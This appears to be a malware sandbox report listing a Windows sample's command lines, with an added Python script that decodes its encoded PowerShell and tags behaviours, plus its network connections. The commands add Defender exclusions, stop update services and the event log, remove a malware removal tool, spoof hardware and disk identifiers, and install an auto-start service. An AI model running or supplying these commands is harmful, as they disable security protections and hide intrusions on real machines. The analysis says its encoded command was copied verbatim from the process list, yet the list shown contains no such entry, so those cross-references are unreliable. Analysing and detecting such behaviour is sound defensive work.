| C:\ProgramData\Microsoft\Windows\DevManView.exe | C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard"" |
| C:\ProgramData\Microsoft\Windows\DevManView.exe | C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard"" |
| C:\ProgramData\Microsoft\Windows\DevManView.exe | C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard"" |
| C:\ProgramData\Microsoft\Windows\DevManView.exe | C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard"" |
| C:\ProgramData\Microsoft\Windows\DevManView.exe | C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard"" |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB |
| C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 17975HP-TRGT32468AB |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 317985HP-TRGT31945DQ |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 717985HP-TRGT31945MST |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 617985HP-TRGT31945FU |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 417985HP-TRGT31945FA |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 517985HP-TRGT31945SL |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 817985HP-TRGT31945SG |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 217985HP-TRGT31945RV |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 518001HP-TRGT20151SL |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 318005HP-TRGT30900DQ |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 718005HP-TRGT30900MST |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 618005HP-TRGT30900FU |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 418001HP-TRGT20151FA |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 818001HP-TRGT20151SG |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 218001HP-TRGT20151RV |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 18001HP-TRGT20151AB |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 218021HP-TRGT19106RV |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 418021HP-TRGT19106FA |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 518021HP-TRGT19106SL |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 718021HP-TRGT19106MST |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 318021HP-TRGT19106DQ |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 618021HP-TRGT19106FU |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ |
| C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 818021HP-TRGT19106SG |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG |
| C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 18021HP-TRGT19106AB |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop wuauserv |
| C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: MZCZ-INRS |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: MZCZ-INRS |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop dosvc |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop bits |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop WaaSMedicSvc |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop UsoSvc |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart |
| C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 |
| C:\Windows\system32\wusa.exe | wusa /uninstall /kb:890830 /quiet /norestart |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: CTKV-Z543 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: CTKV-Z543 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 3ZBA-R7ET |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 3ZBA-R7ET |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 9208-Z9JG |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 9208-Z9JG |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe delete "driverupdate" |
| C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe start "driverupdate" |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop eventlog |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto" |
| C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 |
| C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U35-0TJ9 |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U35-0TJ9 |
| C:\ProgramData\VC_redist.x64.exe | C:\ProgramData\VC_redist.x64.exe |
| C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: ED8I-JG46 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: ED8I-JG46 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: HI6V-FLNM |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: HI6V-FLNM |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3MG1-LPM1 |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3MG1-LPM1 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 5OID-I6E4 |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 5OID-I6E4 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: I75N-FRZC |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: I75N-FRZC |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KO8Z-OEZ1 |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KO8Z-OEZ1 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: ZDOC-BT66 |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: ZDOC-BT66 |
| C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 |
| C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 |
| C:\Windows\system32\conhost.exe | C:\Windows\system32\conhost.exe |
| C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 |
| C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop dosvc |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: NVKV-9KBJ |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop bits |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: NVKV-9KBJ |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop wuauserv |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop WaaSMedicSvc |
| C:\Windows\system32\wusa.exe | wusa /uninstall /kb:890830 /quiet /norestart |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop UsoSvc |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: N28T-B91O |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: N28T-B91O |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: KPPR-9I8R |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: KPPR-9I8R |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: RLKL-STNJ |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: RLKL-STNJ |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 4G61-O3S9 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 4G61-O3S9 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 4VA6-VHUD |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 4VA6-VHUD |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: C2EU-LHH0 |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: C2EU-LHH0 |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: DK4V-OGG2 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: DK4V-OGG2 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 75VK-CPEA |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 75VK-CPEA |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 4398-NFSD |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 4398-NFSD |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 66DN-BEGB |
| C:\ProgramData\Microsoft\Windows\Volumeid64.exe | C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 66DN-BEGB |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys |
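The Processes list above is the whole playbook of this sample: a Defender exclusion pushed through an -EncodedCommand padded with `<# #>` block comments, Windows Update and the event log stopped with sc.exe, MSRT (KB890830) removed with wusa, SMBIOS strings rewritten with AMIDEWINx64 using `%RANDOM%HP-TRGT%RANDOM%` values, volume serials rewritten with Volumeid64, storage devices removed with DevManView, and a "driverupdate" service pointed at C:\ProgramData\VC_redist.x64.exe. The Python below is an added example, not part of the sandbox report or of the sample: it decodes and de-obfuscates the encoded PowerShell exactly as recorded above, tags command lines with behaviour names chosen for this example (the service names and AMIDEWIN switches in the rules are the ones that appear in the list, nothing more), and flags SMBIOS values shaped like the ones the spoofer writes. SAMPLE_CMDLINES is a constructed subset of the report's command lines, and the SMBIOS dictionary passed to smbios_looks_spoofed is constructed too; on a real host that dictionary would come from Win32_BIOS/Win32_BaseBoard or dmidecode.

```python
"""Added example, not part of the sandbox report: decode the obfuscated
-EncodedCommand from the Processes list, tag command lines by the behaviour
they implement, and recognise the SMBIOS values the spoofer writes."""
import base64
import binascii
import re

# Copied verbatim from the powershell.exe entry in the Processes list.
ENCODED_COMMAND = "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="

# Constructed subset of the report's command lines (the report repeats most
# of them many times; one of each kind is enough to exercise the rules).
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "' + ENCODED_COMMAND + '"',
    r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force",
    r"C:\Windows\system32\sc.exe stop wuauserv",
    r"C:\Windows\system32\sc.exe stop eventlog",
    r'C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"',
    r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart",
    r"C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 17975HP-TRGT32468AB",
    r"C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: ZFB2-0U5Z",
    r'C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""',
    r"C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0",
]

# Behaviour tags written for this example. Service names and AMIDEWIN
# switches are exactly those seen in the Processes list.
RULES = [
    ("encoded_powershell", r'\bpowershell\b.*?\s-(?:e|ec|enc|encodedcommand)\s+"?[A-Za-z0-9+/=]{16,}'),
    ("defender_exclusion", r"\bAdd-MpPreference\b.*?-Exclusion(?:Path|Extension|Process)\b"),
    ("update_service_stop", r"\bsc(?:\.exe)?\s+stop\s+(?:wuauserv|dosvc|bits|WaaSMedicSvc|UsoSvc)\b"),
    ("eventlog_stop", r"\bsc(?:\.exe)?\s+stop\s+eventlog\b"),
    ("service_from_programdata", r'\bsc(?:\.exe)?\s+create\b.*?binpath=\s*"?C:\\ProgramData\\'),
    ("msrt_removed", r"\bwusa\b.*?/uninstall\s+/kb:890830\b"),
    ("smbios_rewrite", r"\bAMIDEWINx64\.exe\s+/(?:SS|SU|SK|SM|SV|BM|BV|BS|PSN)\b"),
    ("volume_serial_rewrite", r"\bVolumeid64\.exe\s+[a-z]:\s+[0-9A-Z]{4}-[0-9A-Z]{4}\b"),
    ("device_uninstall", r"\bDevManView\.exe\s+/uninstall\b"),
    ("sleep_disabled", r"\bpowercfg(?:\.exe)?\s+/x\s+-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b"),
]

# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc).
_ENCODED_ARG = re.compile(r'\s-(?:e|ec|enc|encodedcommand)\s+"?([A-Za-z0-9+/=]+)', re.I)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries the script as base64 over its UTF-16LE bytes."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_block_comments(script: str) -> str:
    """Drop the <# ... #> comments used here as junk padding and collapse
    the whitespace they leave behind."""
    no_comments = re.sub(r"<#.*?#>", "", script, flags=re.S)
    return re.sub(r"\s+", " ", no_comments).strip()


def classify(cmdline: str) -> list:
    """Return the behaviour tags a command line triggers. An encoded
    PowerShell payload is decoded and de-obfuscated so that the inner
    command is tagged as well as the outer launcher."""
    tags = [name for name, pat in RULES if re.search(pat, cmdline, re.I)]
    m = _ENCODED_ARG.search(cmdline)
    if m:
        try:
            inner = strip_block_comments(decode_encoded_command(m.group(1)))
        except (binascii.Error, UnicodeDecodeError):
            return tags  # not real base64/UTF-16; keep the outer tags only
        tags += [name for name, pat in RULES
                 if name not in tags and re.search(pat, inner, re.I)]
    return tags


def summarize(cmdlines) -> dict:
    """Count how many command lines triggered each tag."""
    counts = {}
    for line in cmdlines:
        for tag in classify(line):
            counts[tag] = counts.get(tag, 0) + 1
    return counts


# Value shapes written by the AMIDEWINx64 calls above: a fixed manufacturer
# string and <digits>HP-TRGT<digits><2-3 letters> built from cmd's %RANDOM%.
SPOOFED_SMBIOS_VALUE = re.compile(r"^(?:\d+HP-TRGT\d+[A-Z]{2,3}|HOPESA-RSPPOF)$")


def smbios_looks_spoofed(fields: dict) -> list:
    """Names of SMBIOS fields whose value matches the spoofer's output shape.
    `fields` is whatever the caller read from WMI or dmidecode (constructed
    values in the usage below)."""
    return [name for name, value in fields.items()
            if isinstance(value, str) and SPOOFED_SMBIOS_VALUE.match(value.strip())]


if __name__ == "__main__":
    print(strip_block_comments(decode_encoded_command(ENCODED_COMMAND)))
    for line in SAMPLE_CMDLINES:
        print(classify(line), line[:72])
    print(summarize(SAMPLE_CMDLINES))
    # Constructed SMBIOS values modelled on the report, not read from a host.
    print(smbios_looks_spoofed({"SerialNumber": "18021HP-TRGT19106AB",
                                "Manufacturer": "HOPESA-RSPPOF",
                                "Version": "1.0"}))
```

Decoding the launcher first matters: the raw command line for the 32-bit powershell.exe above contains no "Add-MpPreference" at all, so a rule that only looks at the outer string misses the exclusion, while the decoded text (with the `<#xcg#>`-style padding removed) is the same cmdlet the later plaintext powershell.exe entry runs.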
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | brofisthej.ddns.net | udp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
